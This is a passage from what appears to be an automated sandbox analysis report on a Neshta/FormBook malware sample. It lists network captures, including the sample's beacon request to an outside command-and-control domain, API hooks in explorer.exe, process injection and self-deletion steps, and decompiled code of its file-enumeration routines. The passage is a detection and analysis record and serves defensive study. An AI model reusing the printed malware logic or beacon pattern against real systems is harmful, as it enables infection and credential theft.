                                                                                                                        Jun 10, 2021 20:54:17.769121885 CEST5612953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:17.828820944 CEST53561298.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:39.738754034 CEST5817753192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:39.799232960 CEST53581778.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:56.943981886 CEST5070053192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST53507008.8.8.8192.168.2.6

                                                                                                                        DNS Queries

                                                                                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                                        Jun 10, 2021 20:54:56.943981886 CEST | 192.168.2.6 | 8.8.8.8 | 0x2681 | Standard query (0) | www.agileintelligence.coach | A (IP address) | IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST | 8.8.8.8 | 192.168.2.6 | 0x2681 | No error (0) | www.agileintelligence.coach | agileintelligence.coach | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST | 8.8.8.8 | 192.168.2.6 | 0x2681 | No error (0) | agileintelligence.coach | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.agileintelligence.coach

                                                                                                                        HTTP Packets

                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        0 | 192.168.2.6 | 49753 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        Jun 10, 2021 20:54:57.072968960 CEST | 5532 | OUT | GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1
                                                                                                                        Host: www.agileintelligence.coach
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 10, 2021 20:54:57.211914062 CEST | 5533 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 10 Jun 2021 18:54:57 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60ba413e-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Code Manipulations

                                                                                                                        User Modules

                                                                                                                        Hook Summary

                                                                                                                        Function Name | Hook Type | Active in Processes
                                                                                                                        PeekMessageA | INLINE | explorer.exe
                                                                                                                        PeekMessageW | INLINE | explorer.exe
                                                                                                                        GetMessageW | INLINE | explorer.exe
                                                                                                                        GetMessageA | INLINE | explorer.exe

                                                                                                                        Processes

                                                                                                                        Process: explorer.exe, Module: user32.dll
                                                                                                                        Function Name | Hook Type | New Data
                                                                                                                        PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                                                                                        PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                                                                        GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                                                                        GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:20:53:02
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:284661 bytes
                                                                                                                        MD5 hash:F478C15F5AFFD8359762B8C6B0E913A4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:04
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:05
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:
                                                                                                                        Imagebase:0x7ff6f22f0000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:20:53:16
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\svchost.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:41472 bytes
                                                                                                                        MD5 hash:713C9023AF9454658983BDEEC3B3F4D4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:17
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:21
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:54:05
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Imagebase:0xe0000
                                                                                                                        File size:32768 bytes
                                                                                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:20:54:10
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x2a0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:20:54:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:20:54:47
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\help.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                        Imagebase:0x10a0000
                                                                                                                        File size:10240 bytes
                                                                                                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        Disassembly

                                                                                                                        Code Analysis


                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                          				char _v292;
                                                                                                                          				char _v336;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				CHAR* _t38;
                                                                                                                          				void* _t39;
                                                                                                                          				int _t45;
                                                                                                                          				intOrPtr _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				void* _t58;
                                                                                                                          				void* _t60;
                                                                                                                          				void* _t63;
                                                                                                                          				void* _t69;
                                                                                                                          				void* _t70;
                                                                                                                          				void* _t80;
                                                                                                                          				void* _t82;
                                                                                                                          				void* _t83;
                                                                                                                          				void* _t84;
                                                                                                                          				void* _t85;
                                                                                                                          				void* _t86;
                                                                                                                          				struct _WIN32_FIND_DATAA* _t87;
                                                                                                                          
                                                                                                                          				_t85 = __esi;
                                                                                                                          				_t70 = __edx;
                                                                                                                          				_t61 = __ecx;
                                                                                                                          				_t60 = __eax;
                                                                                                                          				asm("pushad");
                                                                                                                          				E004052D8(__eax);
                                                                                                                          				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
                                                                                                                          				asm("popad");
                                                                                                                          				asm("pushad");
                                                                                                                          				_t2 = _t60 + 0x1c; // 0x1c
                                                                                                                          				E004030E8(_t2, _t70);
                                                                                                                          				asm("popad");
                                                                                                                          				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
                                                                                                                          					asm("pushad");
                                                                                                                          					_t4 = _t60 + 0x1c; // 0x1c
                                                                                                                          					E00404DB8( *_t4, _t4);
                                                                                                                          					_t32 =  *((intOrPtr*)(_t60 + 0x20));
                                                                                                                          					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
                                                                                                                          						_t56 = E00405C80();
                                                                                                                          						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
                                                                                                                          						asm("popad");
                                                                                                                          						asm("pushad");
                                                                                                                          						_t57 = _t61;
                                                                                                                          						_t61 = _t56;
                                                                                                                          						_t58 = E004048D8(_t57, _t56, 0x40569b);
                                                                                                                          						_t82 = _t61;
                                                                                                                          						if(_t58 == 0) {
                                                                                                                          							_t82 = E004056A7;
                                                                                                                          						}
                                                                                                                          						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
                                                                                                                          					}
                                                                                                                          					asm("popad");
                                                                                                                          					_t87 = _t86 + 0xfffffec0;
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
                                                                                                                          					_pop(_t63);
                                                                                                                          					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
                                                                                                                          					E004044A8();
                                                                                                                          					_t38 = _t63;
                                                                                                                          					_push(_t38);
                                                                                                                          					_t39 = FindFirstFileA(_t38, _t87); // executed
                                                                                                                          					_t84 = _t39;
                                                                                                                          					asm("pushfd");
                                                                                                                          					E00403094(_t87);
                                                                                                                          					asm("popfd");
                                                                                                                          					if(_t39 + 1 != 0) {
                                                                                                                          						do {
                                                                                                                          							if(E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4) != 0) {
                                                                                                                          								asm("jecxz 0x16");
                                                                                                                          								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
                                                                                                                          								asm("jecxz 0x22");
                                                                                                                          								asm("loop 0x31");
                                                                                                                          								_push(E00402448(0x140));
                                                                                                                          								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
                                                                                                                          								_pop(_t80);
                                                                                                                          								_t69 = 0x140;
                                                                                                                          								E0040254C(_t87, _t69, _t80);
                                                                                                                          							}
                                                                                                                          							_t45 = FindNextFileA(_t84, _t87); // executed
                                                                                                                          						} while (_t45 != 0);
                                                                                                                          						FindClose(_t84); // executed
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t60 + 0x20)) = 0;
                                                                                                                          				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
                                                                                                                          			}


























                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E00405080(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				struct _WIN32_FIND_DATAA _v336;
                                                                                                                          				char _v340;
                                                                                                                          				char _v344;
                                                                                                                          				signed int _t50;
                                                                                                                          				signed int _t51;
                                                                                                                          				int _t53;
                                                                                                                          				intOrPtr* _t76;
                                                                                                                          				intOrPtr _t85;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t99;
                                                                                                                          
                                                                                                                          				_v344 = 0;
                                                                                                                          				_v340 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_t76 = __ecx;
                                                                                                                          				_v12 = __edx;
                                                                                                                          				_v8 = __eax;
                                                                                                                          				E004033FC(_v8);
                                                                                                                          				E004033FC(_v12);
                                                                                                                          				_push(_t99);
                                                                                                                          				_push(0x4051db);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t99 + 0xfffffeac;
                                                                                                                          				E00403094(__ecx);
                                                                                                                          				if(_v8 != 0 &&  *((char*)(_v8 + E0040320C(_v8) - 1)) != 0x5c) {
                                                                                                                          					E00403214( &_v8, 0x4051f0);
                                                                                                                          				}
                                                                                                                          				if(_v12 != 0 &&  *_v12 == 0x5c) {
                                                                                                                          					E00404728(_v12,  &_v340, 2);
                                                                                                                          					E0040312C( &_v12, _v340);
                                                                                                                          				}
                                                                                                                          				E00403258( &_v16, _v12, _v8);
                                                                                                                          				_t50 = FindFirstFileA(E0040340C(_v16),  &_v336); // executed
                                                                                                                          				_t96 = _t50;
                                                                                                                          				_t51 = _t50 & 0xffffff00 | _t96 != 0x00000000;
                                                                                                                          				while(_t51 != 0) {
                                                                                                                          					if((_v336.dwFileAttributes & 0x00000010) <= 0) {
                                                                                                                          						if( *_t76 != 0) {
                                                                                                                          							E00403214(_t76, E004051FC);
                                                                                                                          						}
                                                                                                                          						_push( *_t76);
                                                                                                                          						_push(_v8);
                                                                                                                          						E004031F4( &_v344, 0x104,  &(_v336.cFileName));
                                                                                                                          						_push(_v344);
                                                                                                                          						E004032CC();
                                                                                                                          					}
                                                                                                                          					_t53 = FindNextFileA(_t96,  &_v336); // executed
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_t51 = _t53 + 1;
                                                                                                                          				}
                                                                                                                          				FindClose(_t96); // executed
                                                                                                                          				_pop(_t85);
                                                                                                                          				 *[fs:eax] = _t85;
                                                                                                                          				_push(E004051E2);
                                                                                                                          				E004030B8( &_v344, 2);
                                                                                                                          				return E004030B8( &_v16, 3);
                                                                                                                          			}

















                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040519B
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 55%
                                                                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                          				void* _t14;
                                                                                                                          				CHAR* _t20;
                                                                                                                          				void* _t21;
                                                                                                                          				int _t30;
                                                                                                                          				void* _t41;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t51;
                                                                                                                          				void* _t60;
                                                                                                                          				void* _t62;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t67;
                                                                                                                          				struct _WIN32_FIND_DATAA* _t68;
                                                                                                                          
                                                                                                                          				_t64 = __esi;
                                                                                                                          				_t41 = __ebx;
                                                                                                                          				_t14 = __eax -  *__eax;
                                                                                                                          				asm("popad");
                                                                                                                          				_t68 = _t67 + 0xfffffec0;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
                                                                                                                          				_pop(_t45);
                                                                                                                          				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
                                                                                                                          				E004044A8();
                                                                                                                          				_t20 = _t45;
                                                                                                                          				_push(_t20);
                                                                                                                          				_t21 = FindFirstFileA(_t20, _t68); // executed
                                                                                                                          				_t62 = _t21;
                                                                                                                          				asm("pushfd");
                                                                                                                          				E00403094(_t68);
                                                                                                                          				asm("popfd");
                                                                                                                          				if(_t21 + 1 != 0) {
                                                                                                                          					do {
                                                                                                                          						if(E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))) != 0) {
                                                                                                                          							asm("jecxz 0x16");
                                                                                                                          							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
                                                                                                                          							asm("jecxz 0x22");
                                                                                                                          							asm("loop 0x31");
                                                                                                                          							_push(E00402448(0x140));
                                                                                                                          							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
                                                                                                                          							_pop(_t60);
                                                                                                                          							_t51 = 0x140;
